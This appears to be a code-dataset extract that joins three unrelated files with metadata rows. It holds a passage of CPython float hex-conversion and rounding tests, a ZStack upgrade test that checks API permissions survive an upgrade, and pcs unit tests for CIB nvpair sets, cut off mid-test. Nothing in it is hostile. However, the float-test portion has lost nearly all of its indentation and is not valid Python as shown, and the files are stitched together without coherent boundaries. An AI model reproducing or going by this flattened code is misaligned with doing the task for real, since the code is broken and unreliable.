self.assertEqual(str(1e300 * 1e300 * 0), "nan")
self.assertEqual(str(-1e300 * 1e300 * 0), "nan")
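    # The "notest_" prefix keeps the two checks below disabled: they assume
    # float.is_nan() / float.is_inf() methods, which this interpreter may not
    # provide.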
def notest_float_nan(self):
        self.assertTrue(NAN.is_nan())
        self.assertFalse(INF.is_nan())
        self.assertFalse((0.).is_nan())
def notest_float_inf(self):
        self.assertTrue(INF.is_inf())
        self.assertFalse(NAN.is_inf())
        self.assertFalse((0.).is_inf())
fromHex = float.fromhex
toHex = float.hex
class HexFloatTestCase(unittest.TestCase):
MAX = fromHex('0x.fffffffffffff8p+1024') # max normal
MIN = fromHex('0x1p-1022') # min normal
TINY = fromHex('0x0.0000000000001p-1022') # min subnormal
EPS = fromHex('0x0.0000000000001p0') # diff between 1.0 and next float up
def identical(self, x, y):
# check that floats x and y are identical, or that both
# are NaNs
if isnan(x) or isnan(y):
if isnan(x) == isnan(y):
return
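        # non-NaN case: == alone treats 0.0 and -0.0 as equal, so the signs
        # are compared via copysign to tell the two zeros apart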
elif x == y and (x != 0.0 or copysign(1.0, x) == copysign(1.0, y)):
return
self.fail('%r not identical to %r' % (x, y))
def test_ends(self):
self.identical(self.MIN, ldexp(1.0, -1022))
self.identical(self.TINY, ldexp(1.0, -1074))
self.identical(self.EPS, ldexp(1.0, -52))
self.identical(self.MAX, 2.*(ldexp(1.0, 1023) - ldexp(1.0, 970)))
def test_invalid_inputs(self):
invalid_inputs = [
'infi', # misspelt infinities and nans
'-Infinit',
'++inf',
'-+Inf',
'--nan',
'+-NaN',
'snan',
'NaNs',
'nna',
'0xnan',
'',
' ',
'x1.0p0',
'0xX1.0p0',
'+ 0x1.0p0', # internal whitespace
'- 0x1.0p0',
'0 x1.0p0',
'0x 1.0p0',
'0x1 2.0p0',
'+0x1 .0p0',
'0x1. 0p0',
'-0x1.0 1p0',
'-0x1.0 p0',
'+0x1.0p +0',
'0x1.0p -0',
'0x1.0p 0',
'+0x1.0p+ 0',
'-0x1.0p- 0',
'++0x1.0p-0', # double signs
'--0x1.0p0',
'+-0x1.0p+0',
'-+0x1.0p0',
'0x1.0p++0',
'+0x1.0p+-0',
'-0x1.0p-+0',
'0x1.0p--0',
'0x1.0.p0',
'0x.p0', # no hex digits before or after point
'0x1,p0', # wrong decimal point character
'0x1pa',
u'0x1p\uff10', # fullwidth Unicode digits
u'\uff10x1p0',
u'0x\uff11p0',
u'0x1.\uff10p0',
'0x1p0 \n 0x2p0',
'0x1p0\0 0x1p0', # embedded null byte is not end of string
]
for x in invalid_inputs:
try:
result = fromHex(x)
except ValueError:
pass
else:
self.fail('Expected float.fromhex(%r) to raise ValueError; '
'got %r instead' % (x, result))
def test_from_hex(self):
        MIN = self.MIN
        MAX = self.MAX
        TINY = self.TINY
        EPS = self.EPS
# two spellings of infinity, with optional signs; case-insensitive
self.identical(fromHex('inf'), INF)
self.identical(fromHex('+Inf'), INF)
self.identical(fromHex('-INF'), -INF)
self.identical(fromHex('iNf'), INF)
self.identical(fromHex('Infinity'), INF)
self.identical(fromHex('+INFINITY'), INF)
self.identical(fromHex('-infinity'), -INF)
self.identical(fromHex('-iNFiNitY'), -INF)
# nans with optional sign; case insensitive
self.identical(fromHex('nan'), NAN)
self.identical(fromHex('+NaN'), NAN)
self.identical(fromHex('-NaN'), NAN)
self.identical(fromHex('-nAN'), NAN)
# variations in input format
self.identical(fromHex('1'), 1.0)
self.identical(fromHex('+1'), 1.0)
self.identical(fromHex('1.'), 1.0)
self.identical(fromHex('1.0'), 1.0)
self.identical(fromHex('1.0p0'), 1.0)
self.identical(fromHex('01'), 1.0)
self.identical(fromHex('01.'), 1.0)
self.identical(fromHex('0x1'), 1.0)
self.identical(fromHex('0x1.'), 1.0)
self.identical(fromHex('0x1.0'), 1.0)
self.identical(fromHex('+0x1.0'), 1.0)
self.identical(fromHex('0x1p0'), 1.0)
self.identical(fromHex('0X1p0'), 1.0)
self.identical(fromHex('0X1P0'), 1.0)
self.identical(fromHex('0x1P0'), 1.0)
self.identical(fromHex('0x1.p0'), 1.0)
self.identical(fromHex('0x1.0p0'), 1.0)
self.identical(fromHex('0x.1p4'), 1.0)
self.identical(fromHex('0x.1p04'), 1.0)
self.identical(fromHex('0x.1p004'), 1.0)
self.identical(fromHex('0x1p+0'), 1.0)
self.identical(fromHex('0x1P-0'), 1.0)
self.identical(fromHex('+0x1p0'), 1.0)
self.identical(fromHex('0x01p0'), 1.0)
self.identical(fromHex('0x1p00'), 1.0)
self.identical(fromHex(u'0x1p0'), 1.0)
self.identical(fromHex(' 0x1p0 '), 1.0)
self.identical(fromHex('\n 0x1p0'), 1.0)
self.identical(fromHex('0x1p0 \t'), 1.0)
self.identical(fromHex('0xap0'), 10.0)
self.identical(fromHex('0xAp0'), 10.0)
self.identical(fromHex('0xaP0'), 10.0)
self.identical(fromHex('0xAP0'), 10.0)
self.identical(fromHex('0xbep0'), 190.0)
self.identical(fromHex('0xBep0'), 190.0)
self.identical(fromHex('0xbEp0'), 190.0)
self.identical(fromHex('0XBE0P-4'), 190.0)
self.identical(fromHex('0xBEp0'), 190.0)
self.identical(fromHex('0xB.Ep4'), 190.0)
self.identical(fromHex('0x.BEp8'), 190.0)
self.identical(fromHex('0x.0BEp12'), 190.0)
# moving the point around
pi = fromHex('0x1.921fb54442d18p1')
self.identical(fromHex('0x.006487ed5110b46p11'), pi)
self.identical(fromHex('0x.00c90fdaa22168cp10'), pi)
self.identical(fromHex('0x.01921fb54442d18p9'), pi)
self.identical(fromHex('0x.03243f6a8885a3p8'), pi)
self.identical(fromHex('0x.06487ed5110b46p7'), pi)
self.identical(fromHex('0x.0c90fdaa22168cp6'), pi)
self.identical(fromHex('0x.1921fb54442d18p5'), pi)
self.identical(fromHex('0x.3243f6a8885a3p4'), pi)
self.identical(fromHex('0x.6487ed5110b46p3'), pi)
self.identical(fromHex('0x.c90fdaa22168cp2'), pi)
self.identical(fromHex('0x1.921fb54442d18p1'), pi)
self.identical(fromHex('0x3.243f6a8885a3p0'), pi)
self.identical(fromHex('0x6.487ed5110b46p-1'), pi)
self.identical(fromHex('0xc.90fdaa22168cp-2'), pi)
self.identical(fromHex('0x19.21fb54442d18p-3'), pi)
self.identical(fromHex('0x32.43f6a8885a3p-4'), pi)
self.identical(fromHex('0x64.87ed5110b46p-5'), pi)
self.identical(fromHex('0xc9.0fdaa22168cp-6'), pi)
self.identical(fromHex('0x192.1fb54442d18p-7'), pi)
self.identical(fromHex('0x324.3f6a8885a3p-8'), pi)
self.identical(fromHex('0x648.7ed5110b46p-9'), pi)
self.identical(fromHex('0xc90.fdaa22168cp-10'), pi)
self.identical(fromHex('0x1921.fb54442d18p-11'), pi)
# ...
self.identical(fromHex('0x1921fb54442d1.8p-47'), pi)
self.identical(fromHex('0x3243f6a8885a3p-48'), pi)
self.identical(fromHex('0x6487ed5110b46p-49'), pi)
self.identical(fromHex('0xc90fdaa22168cp-50'), pi)
self.identical(fromHex('0x1921fb54442d18p-51'), pi)
self.identical(fromHex('0x3243f6a8885a30p-52'), pi)
self.identical(fromHex('0x6487ed5110b460p-53'), pi)
self.identical(fromHex('0xc90fdaa22168c0p-54'), pi)
self.identical(fromHex('0x1921fb54442d180p-55'), pi)
# results that should overflow...
self.assertRaises(OverflowError, fromHex, '-0x1p1024')
self.assertRaises(OverflowError, fromHex, '0x1p+1025')
self.assertRaises(OverflowError, fromHex, '+0X1p1030')
self.assertRaises(OverflowError, fromHex, '-0x1p+1100')
self.assertRaises(OverflowError, fromHex, '0X1p123456789123456789')
self.assertRaises(OverflowError, fromHex, '+0X.8p+1025')
self.assertRaises(OverflowError, fromHex, '+0x0.8p1025')
self.assertRaises(OverflowError, fromHex, '-0x0.4p1026')
self.assertRaises(OverflowError, fromHex, '0X2p+1023')
self.assertRaises(OverflowError, fromHex, '0x2.p1023')
self.assertRaises(OverflowError, fromHex, '-0x2.0p+1023')
self.assertRaises(OverflowError, fromHex, '+0X4p+1022')
self.assertRaises(OverflowError, fromHex, '0x1.ffffffffffffffp+1023')
self.assertRaises(OverflowError, fromHex, '-0X1.fffffffffffff9p1023')
self.assertRaises(OverflowError, fromHex, '0X1.fffffffffffff8p1023')
self.assertRaises(OverflowError, fromHex, '+0x3.fffffffffffffp1022')
self.assertRaises(OverflowError, fromHex, '0x3fffffffffffffp+970')
self.assertRaises(OverflowError, fromHex, '0x10000000000000000p960')
self.assertRaises(OverflowError, fromHex, '-0Xffffffffffffffffp960')
# ...and those that round to +-max float
self.identical(fromHex('+0x1.fffffffffffffp+1023'), MAX)
self.identical(fromHex('-0X1.fffffffffffff7p1023'), -MAX)
self.identical(fromHex('0X1.fffffffffffff7fffffffffffffp1023'), MAX)
# zeros
self.identical(fromHex('0x0p0'), 0.0)
self.identical(fromHex('0x0p1000'), 0.0)
self.identical(fromHex('-0x0p1023'), -0.0)
self.identical(fromHex('0X0p1024'), 0.0)
self.identical(fromHex('-0x0p1025'), -0.0)
self.identical(fromHex('0X0p2000'), 0.0)
self.identical(fromHex('0x0p123456789123456789'), 0.0)
self.identical(fromHex('-0X0p-0'), -0.0)
self.identical(fromHex('-0X0p-1000'), -0.0)
self.identical(fromHex('0x0p-1023'), 0.0)
self.identical(fromHex('-0X0p-1024'), -0.0)
self.identical(fromHex('-0x0p-1025'), -0.0)
self.identical(fromHex('-0x0p-1072'), -0.0)
self.identical(fromHex('0X0p-1073'), 0.0)
self.identical(fromHex('-0x0p-1074'), -0.0)
self.identical(fromHex('0x0p-1075'), 0.0)
self.identical(fromHex('0X0p-1076'), 0.0)
self.identical(fromHex('-0X0p-2000'), -0.0)
self.identical(fromHex('-0x0p-123456789123456789'), -0.0)
# values that should underflow to 0
self.identical(fromHex('0X1p-1075'), 0.0)
self.identical(fromHex('-0X1p-1075'), -0.0)
self.identical(fromHex('-0x1p-123456789123456789'), -0.0)
self.identical(fromHex('0x1.00000000000000001p-1075'), TINY)
self.identical(fromHex('-0x1.1p-1075'), -TINY)
self.identical(fromHex('0x1.fffffffffffffffffp-1075'), TINY)
# check round-half-even is working correctly near 0 ...
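        # here 0x4p-1076 equals TINY, so exact halfway cases such as
        # 0x2p-1076 and 0x6p-1076 round to the neighbour whose last bit is even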
self.identical(fromHex('0x1p-1076'), 0.0)
self.identical(fromHex('0X2p-1076'), 0.0)
self.identical(fromHex('0X3p-1076'), TINY)
self.identical(fromHex('0x4p-1076'), TINY)
self.identical(fromHex('0X5p-1076'), TINY)
self.identical(fromHex('0X6p-1076'), 2*TINY)
self.identical(fromHex('0x7p-1076'), 2*TINY)
self.identical(fromHex('0X8p-1076'), 2*TINY)
self.identical(fromHex('0X9p-1076'), 2*TINY)
self.identical(fromHex('0xap-1076'), 2*TINY)
self.identical(fromHex('0Xbp-1076'), 3*TINY)
self.identical(fromHex('0xcp-1076'), 3*TINY)
self.identical(fromHex('0Xdp-1076'), 3*TINY)
self.identical(fromHex('0Xep-1076'), 4*TINY)
self.identical(fromHex('0xfp-1076'), 4*TINY)
self.identical(fromHex('0x10p-1076'), 4*TINY)
self.identical(fromHex('-0x1p-1076'), -0.0)
self.identical(fromHex('-0X2p-1076'), -0.0)
self.identical(fromHex('-0x3p-1076'), -TINY)
self.identical(fromHex('-0X4p-1076'), -TINY)
self.identical(fromHex('-0x5p-1076'), -TINY)
self.identical(fromHex('-0x6p-1076'), -2*TINY)
self.identical(fromHex('-0X7p-1076'), -2*TINY)
self.identical(fromHex('-0X8p-1076'), -2*TINY)
self.identical(fromHex('-0X9p-1076'), -2*TINY)
self.identical(fromHex('-0Xap-1076'), -2*TINY)
self.identical(fromHex('-0xbp-1076'), -3*TINY)
self.identical(fromHex('-0xcp-1076'), -3*TINY)
self.identical(fromHex('-0Xdp-1076'), -3*TINY)
self.identical(fromHex('-0xep-1076'), -4*TINY)
self.identical(fromHex('-0Xfp-1076'), -4*TINY)
self.identical(fromHex('-0X10p-1076'), -4*TINY)
# ... and near MIN ...
self.identical(fromHex('0x0.ffffffffffffd6p-1022'), MIN-3*TINY)
self.identical(fromHex('0x0.ffffffffffffd8p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdap-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdcp-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdep-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe0p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe2p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe4p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe6p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe8p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffeap-1022'), MIN-TINY)
self.identical(fromHex('0x0.ffffffffffffecp-1022'), MIN-TINY)
self.identical(fromHex('0x0.ffffffffffffeep-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff0p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff2p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff4p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff6p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff8p-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffap-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffcp-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffep-1022'), MIN)
self.identical(fromHex('0x1.00000000000000p-1022'), MIN)
self.identical(fromHex('0x1.00000000000002p-1022'), MIN)
self.identical(fromHex('0x1.00000000000004p-1022'), MIN)
self.identical(fromHex('0x1.00000000000006p-1022'), MIN)
self.identical(fromHex('0x1.00000000000008p-1022'), MIN)
self.identical(fromHex('0x1.0000000000000ap-1022'), MIN+TINY)
self.identical(fromHex('0x1.0000000000000cp-1022'), MIN+TINY)
self.identical(fromHex('0x1.0000000000000ep-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000010p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000012p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000014p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000016p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000018p-1022'), MIN+2*TINY)
# ... and near 1.0.
self.identical(fromHex('0x0.fffffffffffff0p0'), 1.0-EPS)
self.identical(fromHex('0x0.fffffffffffff1p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff2p0'), 1.0-EPS)
self.identical(fromHex('0x0.fffffffffffff3p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff4p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff5p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffff6p0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffff7p0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffff8p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffff9p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffffap0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffffbp0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffffcp0'), 1.0)
self.identical(fromHex('0x0.fffffffffffffdp0'), 1.0)
self.identical(fromHex('0X0.fffffffffffffep0'), 1.0)
self.identical(fromHex('0x0.ffffffffffffffp0'), 1.0)
self.identical(fromHex('0X1.00000000000000p0'), 1.0)
self.identical(fromHex('0X1.00000000000001p0'), 1.0)
self.identical(fromHex('0x1.00000000000002p0'), 1.0)
self.identical(fromHex('0X1.00000000000003p0'), 1.0)
self.identical(fromHex('0x1.00000000000004p0'), 1.0)
self.identical(fromHex('0X1.00000000000005p0'), 1.0)
self.identical(fromHex('0X1.00000000000006p0'), 1.0)
self.identical(fromHex('0X1.00000000000007p0'), 1.0)
self.identical(fromHex('0x1.00000000000007ffffffffffffffffffffp0'),
1.0)
self.identical(fromHex('0x1.00000000000008p0'), 1.0)
self.identical(fromHex('0x1.00000000000008000000000000000001p0'),
1+EPS)
self.identical(fromHex('0X1.00000000000009p0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000ap0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000bp0'), 1.0+EPS)
self.identical(fromHex('0X1.0000000000000cp0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000dp0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000ep0'), 1.0+EPS)
self.identical(fromHex('0X1.0000000000000fp0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000010p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000011p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000012p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000013p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000014p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000015p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000016p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000017p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000017ffffffffffffffffffffp0'),
1.0+EPS)
self.identical(fromHex('0x1.00000000000018p0'), 1.0+2*EPS)
self.identical(fromHex('0X1.00000000000018000000000000000001p0'),
1.0+2*EPS)
self.identical(fromHex('0x1.00000000000019p0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001ap0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001bp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001cp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001dp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001ep0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001fp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.00000000000020p0'), 1.0+2*EPS)
def test_roundtrip(self):
def roundtrip(x):
return fromHex(toHex(x))
for x in [NAN, INF, self.MAX, self.MIN, self.MIN-self.TINY, self.TINY, 0.0]:
self.identical(x, roundtrip(x))
self.identical(-x, roundtrip(-x))
# fromHex(toHex(x)) should exactly recover x, for any non-NaN float x.
import random
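        # sample random floats as s * ldexp(m, e); ldexp can overflow for the
        # largest exponents, in which case that sample is simply skipped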
for i in xrange(10000):
e = random.randrange(-1200, 1200)
m = random.random()
s = random.choice([1.0, -1.0])
try:
x = s*ldexp(m, e)
except OverflowError:
pass
else:
self.identical(x, fromHex(toHex(x)))
def test_main():
test_support.run_unittest(
GeneralFloatCases,
FormatFunctionsTestCase,
UnknownFormatTestCase,
IEEEFormatTestCase,
ReprTestCase,
InfNanTest,
HexFloatTestCase,
)
if __name__ == '__main__':
test_main()
| lgpl-2.1 | 8,380,972,892,409,875,000 | 43.430667 | 98 | 0.586592 | false |
zstackio/zstack-woodpecker | integrationtest/vm/installation/api_perimission_check/test_zs_upgd_3.5.2_latest_on_cos74_22976.py | 1 | 2730 | '''
Covers issue 22976.
Based on test_zs_upgd_3.5.2_latest_on_cos74.py.
Tests the master upgrade from ZStack 3.5.2.53 and checks that API permissions
are preserved across the upgrade.
@author: Zhaohao
'''
import os
import tempfile
import uuid
import time
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstacklib.utils.ssh as ssh
import zstackwoodpecker.operations.scenario_operations as scen_ops
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
vm_inv = None
def test():
global vm_inv
test_util.test_dsc('Create test vm to test zstack upgrade by -u.')
image_name = os.environ.get('imageNameBase_352_mn_c74')
c74_iso_path = os.environ.get('c74_iso_path')
#iso_21_path = os.environ.get('iso_21_path')
zstack_latest_version = os.environ.get('zstackLatestVersion')
zstack_latest_path = os.environ.get('zstackLatestInstaller')
vm_name = os.environ.get('vmName')
upgrade_script_path = os.environ.get('upgradeScript')
vm_inv = test_stub.create_vm_scenario(image_name, vm_name)
vm_ip = vm_inv.vmNics[0].ip
test_lib.lib_wait_target_up(vm_ip, 22)
test_stub.make_ssh_no_password(vm_ip, tmp_file)
test_util.test_logger('Update MN IP')
test_stub.update_mn_hostname(vm_ip, tmp_file)
test_stub.update_mn_ip(vm_ip, tmp_file)
test_stub.stop_mn(vm_ip, tmp_file)
test_stub.start_node(vm_ip, tmp_file)
test_stub.start_mn(vm_ip, tmp_file)
test_stub.check_mn_running(vm_ip, tmp_file)
test_stub.create_vid(vm_ip, 'vid_test')
pms1 = test_stub.get_vid_permissions(vm_ip, 'vid_test')
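    # snapshot the vid's API permissions before the upgrade; they are compared
    # with the post-upgrade snapshot below (the actual check for issue 22976)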
#test_stub.check_installation(vm_ip, tmp_file)
test_util.test_logger('Upgrade zstack to latest')
test_stub.update_c74_iso(vm_ip, tmp_file, c74_iso_path, upgrade_script_path)
#test_stub.updatei_21_iso(vm_ip, tmp_file, iso_21_path, upgrade_script_path)
test_stub.upgrade_zstack(vm_ip, zstack_latest_path, tmp_file)
test_stub.check_zstack_version(vm_ip, tmp_file, zstack_latest_version)
test_stub.start_mn(vm_ip, tmp_file)
test_stub.check_mn_running(vm_ip, tmp_file)
pms2 = test_stub.get_vid_permissions(vm_ip, 'vid_test')
test_stub.check_permissions(pms1, pms2)
#test_stub.check_installation(vm_ip, tmp_file)
os.system('rm -f %s' % tmp_file)
test_stub.destroy_vm_scenario(vm_inv.uuid)
test_util.test_pass('ZStack 3.5.2 to master upgrade Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vm_inv
os.system('rm -f %s' % tmp_file)
if vm_inv:
test_stub.destroy_vm_scenario(vm_inv.uuid)
test_lib.lib_error_cleanup(test_obj_dict)
| apache-2.0 | -5,392,050,688,931,675,000 | 35.891892 | 80 | 0.699634 | false |
ClusterLabs/pcs | pcs_test/tier0/lib/cib/test_nvpair.py | 3 | 16477 | from unittest import TestCase
from lxml import etree
from pcs_test.tools.assertions import assert_xml_equal
from pcs_test.tools.xml import etree_to_str
from pcs.lib.cib import nvpair
from pcs.lib.cib.tools import IdProvider
# pylint: disable=no-self-use, protected-access
class AppendNewNvpair(TestCase):
def test_append_new_nvpair_to_given_element(self):
nvset_element = etree.fromstring('<nvset id="a"/>')
id_provider = IdProvider(nvset_element)
nvpair._append_new_nvpair(nvset_element, "b", "c", id_provider)
assert_xml_equal(
etree_to_str(nvset_element),
"""
<nvset id="a">
<nvpair id="a-b" name="b" value="c"></nvpair>
</nvset>
""",
)
def test_with_id_provider(self):
nvset_element = etree.fromstring('<nvset id="a"/>')
provider = IdProvider(nvset_element)
provider.book_ids("a-b")
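        # "a-b" is already booked, so the provider must hand out the
        # non-colliding id "a-b-1" for the new nvpair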
nvpair._append_new_nvpair(nvset_element, "b", "c", provider)
assert_xml_equal(
etree_to_str(nvset_element),
"""
<nvset id="a">
<nvpair id="a-b-1" name="b" value="c"></nvpair>
</nvset>
""",
)
class UpdateNvsetTest(TestCase):
def test_updates_nvset(self):
nvset_element = etree.fromstring(
"""
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="b"/>
<nvpair id="iattrs-c" name="c" value="d"/>
<nvpair id="iattrs-e" name="e" value="f"/>
</instance_attributes>
"""
)
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(
nvset_element,
{
"a": "B",
"c": "",
"g": "h",
},
id_provider,
)
assert_xml_equal(
"""
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="B"/>
<nvpair id="iattrs-e" name="e" value="f"/>
<nvpair id="iattrs-g" name="g" value="h"/>
</instance_attributes>
""",
etree_to_str(nvset_element),
)
def test_empty_value_has_no_effect(self):
xml = """
<instance_attributes id="iattrs">
<nvpair id="iattrs-b" name="a" value="b"/>
<nvpair id="iattrs-d" name="c" value="d"/>
<nvpair id="iattrs-f" name="e" value="f"/>
</instance_attributes>
"""
nvset_element = etree.fromstring(xml)
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(nvset_element, {}, id_provider)
assert_xml_equal(xml, etree_to_str(nvset_element))
def test_keep_empty_nvset(self):
xml_pre = """
<resource>
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="b"/>
</instance_attributes>
</resource>
"""
xml_post = """
<resource>
<instance_attributes id="iattrs" />
</resource>
"""
xml = etree.fromstring(xml_pre)
nvset_element = xml.find("instance_attributes")
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(nvset_element, {"a": ""}, id_provider)
assert_xml_equal(xml_post, etree_to_str(xml))
class SetNvpairInNvsetTest(TestCase):
def setUp(self):
self.nvset = etree.Element("nvset", id="nvset")
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr", name="attr", value="1"
)
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr2", name="attr2", value="2"
)
etree.SubElement(
self.nvset, "notnvpair", id="nvset-test", name="test", value="0"
)
self.id_provider = IdProvider(self.nvset)
def test_update(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr", "10", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="10"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_add(self):
nvpair.set_nvpair_in_nvset(self.nvset, "test", "0", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
<nvpair id="nvset-test-1" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_remove(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr2", "", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_remove_not_existing(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr3", "", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
class AppendNewNvsetTest(TestCase):
def test_append_new_nvset_to_given_element(self):
context_element = etree.fromstring('<context id="a"/>')
id_provider = IdProvider(context_element)
nvpair.append_new_nvset(
"instance_attributes",
context_element,
{
"a": "b",
"c": "d",
},
id_provider,
)
assert_xml_equal(
"""
<context id="a">
<instance_attributes id="a-instance_attributes">
<nvpair
id="a-instance_attributes-a" name="a" value="b"
/>
<nvpair
id="a-instance_attributes-c" name="c" value="d"
/>
</instance_attributes>
</context>
""",
etree_to_str(context_element),
)
def test_with_id_provider_booked_ids(self):
context_element = etree.fromstring('<context id="a"/>')
provider = IdProvider(context_element)
provider.book_ids("a-instance_attributes", "a-instance_attributes-1-a")
nvpair.append_new_nvset(
"instance_attributes",
context_element,
{
"a": "b",
"c": "d",
},
provider,
)
assert_xml_equal(
"""
<context id="a">
<instance_attributes id="a-instance_attributes-1">
<nvpair
id="a-instance_attributes-1-a-1" name="a" value="b"
/>
<nvpair
id="a-instance_attributes-1-c" name="c" value="d"
/>
</instance_attributes>
</context>
""",
etree_to_str(context_element),
)
class ArrangeFirstNvsetTest(TestCase):
def setUp(self):
self.root = etree.Element("root", id="root")
self.nvset = etree.SubElement(self.root, "nvset", id="nvset")
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr", name="attr", value="1"
)
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr2", name="attr2", value="2"
)
etree.SubElement(
self.nvset, "notnvpair", id="nvset-test", name="test", value="0"
)
self.id_provider = IdProvider(self.nvset)
def test_empty_value_has_no_effect(self):
nvpair.arrange_first_nvset("nvset", self.root, {}, self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_update_existing_nvset(self):
nvpair.arrange_first_nvset(
"nvset",
self.root,
{"attr": "10", "new_one": "20", "test": "0", "attr2": ""},
self.id_provider,
)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="10"/>
<notnvpair id="nvset-test" name="test" value="0"/>
<nvpair id="nvset-new_one" name="new_one" value="20"/>
<nvpair id="nvset-test-1" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_create_new_nvset_if_does_not_exist(self):
root = etree.Element("root", id="root")
nvpair.arrange_first_nvset(
"nvset",
root,
{"attr": "10", "new_one": "20", "test": "0", "attr2": ""},
self.id_provider,
)
assert_xml_equal(
"""
<root id="root">
<nvset id="root-nvset">
<nvpair id="root-nvset-attr" name="attr" value="10"/>
<nvpair id="root-nvset-new_one" name="new_one" value="20"/>
<nvpair id="root-nvset-test" name="test" value="0"/>
</nvset>
</root>
""",
etree_to_str(root),
)
class GetNvsetTest(TestCase):
def test_success(self):
nvset = etree.XML(
"""
<nvset>
<nvpair id="nvset-name1" name="name1" value="value1"/>
<nvpair id="nvset-name2" name="name2" value="value2"/>
<nvpair id="nvset-name3" name="name3"/>
</nvset>
"""
)
self.assertEqual(
[
{"id": "nvset-name1", "name": "name1", "value": "value1"},
{"id": "nvset-name2", "name": "name2", "value": "value2"},
{"id": "nvset-name3", "name": "name3", "value": ""},
],
